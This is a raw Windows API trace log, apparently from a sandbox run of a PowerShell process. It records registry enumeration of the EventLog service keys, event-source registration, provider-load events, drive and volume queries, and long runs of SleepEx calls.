[0098.601] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x1, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.601] CoTaskMemFree (pv=0x0) [0098.601] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x2, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.601] CoTaskMemFree (pv=0x0) [0098.601] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x3, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.601] CoTaskMemFree (pv=0x0) [0098.601] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x4, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.602] CoTaskMemFree (pv=0x0) [0098.602] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x5, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.602] CoTaskMemFree (pv=0x0) [0098.602] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x6, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.602] CoTaskMemFree (pv=0x0) [0098.602] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x7, lpName=0x4a6c0e4, lpcchName=0x6d3f348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6d3f348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.602] CoTaskMemFree (pv=0x0) [0098.602] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.602] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.602] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.602] RegOpenKeyExW (in: hKey=0x638, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.602] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.602] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.602] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.603] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.603] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x638, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.603] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.603] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.603] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.604] RegOpenKeyExW (in: hKey=0x638, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.604] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x0) returned 0x2 [0098.604] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.604] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x6a0) returned 0x0 [0098.604] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f308 | out: phkResult=0x6d3f308*=0x620) returned 0x0 [0098.604] RegCloseKey (hKey=0x620) returned 0x0 [0098.604] RegCloseKey (hKey=0x638) returned 0x0 [0098.605] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.606] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2c4 | out: phkResult=0x6d3f2c4*=0x6a0) returned 0x0 [0098.607] RegQueryInfoKeyW (in: hKey=0x6a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6d3f314, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f310, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6d3f314*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6d3f310*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x0, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x1, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x2, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x3, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x4, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x5, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x6, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.607] CoTaskMemFree (pv=0x0) [0098.607] RegEnumKeyExW (in: hKey=0x6a0, dwIndex=0x7, lpName=0x4a6d124, lpcchName=0x6d3f330, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6d3f330, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0098.608] CoTaskMemFree (pv=0x0) [0098.608] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.608] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.608] RegCloseKey (hKey=0x638) returned 0x0 [0098.608] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.608] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.608] RegCloseKey (hKey=0x638) returned 0x0 [0098.608] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.608] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.608] RegCloseKey (hKey=0x638) returned 0x0 [0098.608] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.609] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.609] RegCloseKey (hKey=0x638) returned 0x0 [0098.609] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.609] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.609] RegCloseKey (hKey=0x638) returned 0x0 [0098.609] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.609] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.609] RegCloseKey (hKey=0x638) returned 0x0 [0098.609] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.610] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x0) returned 0x2 [0098.610] RegCloseKey (hKey=0x638) returned 0x0 [0098.610] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x638) returned 0x0 [0098.610] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6d3f2f0 | out: phkResult=0x6d3f2f0*=0x620) returned 0x0 [0098.610] RegCloseKey (hKey=0x620) returned 0x0 [0098.610] RegCloseKey (hKey=0x6a0) returned 0x0 [0098.611] RegCloseKey (hKey=0x638) returned 0x0 [0098.757] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x74e0004 [0098.761] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4a84f04*="Registry", lpRawData=0x4a6dd4c) returned 1 [0098.770] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4a872f4*="Alias", lpRawData=0x4a8721c) returned 1 [0098.773] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4a89674*="Environment", lpRawData=0x4a8959c) returned 1 [0098.775] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x6d3f2f4, nSize=0x80 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0098.775] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0098.775] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0098.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d3f3ac) returned 1 [0098.775] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x6d3f428 | out: lpFileInformation=0x6d3f428*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0098.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d3f3a8) returned 1 [0098.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6d3eb50, nSize=0x80 | out: lpBuffer="က溹က溹") returned 0x0 [0098.777] GetLogicalDrives () returned 0x4 [0098.778] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0098.778] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0098.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d3f398) returned 1 [0098.940] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6d3f2a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x6d3f3c0, lpMaximumComponentLength=0x6d3f3bc, lpFileSystemFlags=0x6d3f3b8, lpFileSystemNameBuffer=0x6d3f238, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6d3f3c0*=0xb4197730, lpMaximumComponentLength=0x6d3f3bc*=0xff, lpFileSystemFlags=0x6d3f3b8*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d3f394) returned 1 [0098.941] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.941] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.941] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0098.941] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0098.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d3f350) returned 1 [0098.942] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x4abbe08 | out: lpFileInformation=0x4abbe08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x9470c9b1, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x9470c9b1, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0098.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d3f34c) returned 1 [0098.942] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0098.942] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0098.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.039] PathIsNetworkPathW (pszPath="C:\\") returned 0 [0099.040] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0099.040] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0099.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.044] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0099.045] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4ad94b4*="FileSystem", lpRawData=0x4ad93dc) returned 1 [0099.056] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4adb904*="Function", lpRawData=0x4adb82c) returned 1 [0099.060] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4addbb0*="Variable", lpRawData=0x4addad8) returned 1 [0099.064] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.214] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.783] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.864] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.912] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0100.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.582] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0101.939] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.239] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.417] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.804] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0102.979] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0103.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0103.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0103.535] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0103.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0103.752] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0103.886] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.042] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.146] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.230] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.621] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.792] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0104.915] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0105.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0105.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0105.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0105.485] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0105.905] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.131] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.934] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.061] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0109.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.031] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0110.878] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0111.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0111.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 42 os_tid = 0x1354 [0077.637] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0077.637] CoGetContextToken (in: pToken=0x6ebfad4 | out: pToken=0x6ebfad4) returned 0x0 [0077.637] CObjectContext::QueryInterface () returned 0x0 [0077.637] CObjectContext::GetCurrentThreadType () returned 0x0 [0077.637] Release () returned 0x0 [0077.637] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0077.637] CoUninitialize () [0077.637] RoInitialize () returned 0x1 [0077.638] RoUninitialize () returned 0x0 [0077.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.808] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0078.122] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0078.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0078.604] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0079.123] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0079.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0079.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0079.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0080.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0080.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0080.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0080.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.044] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.609] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0081.806] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.017] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 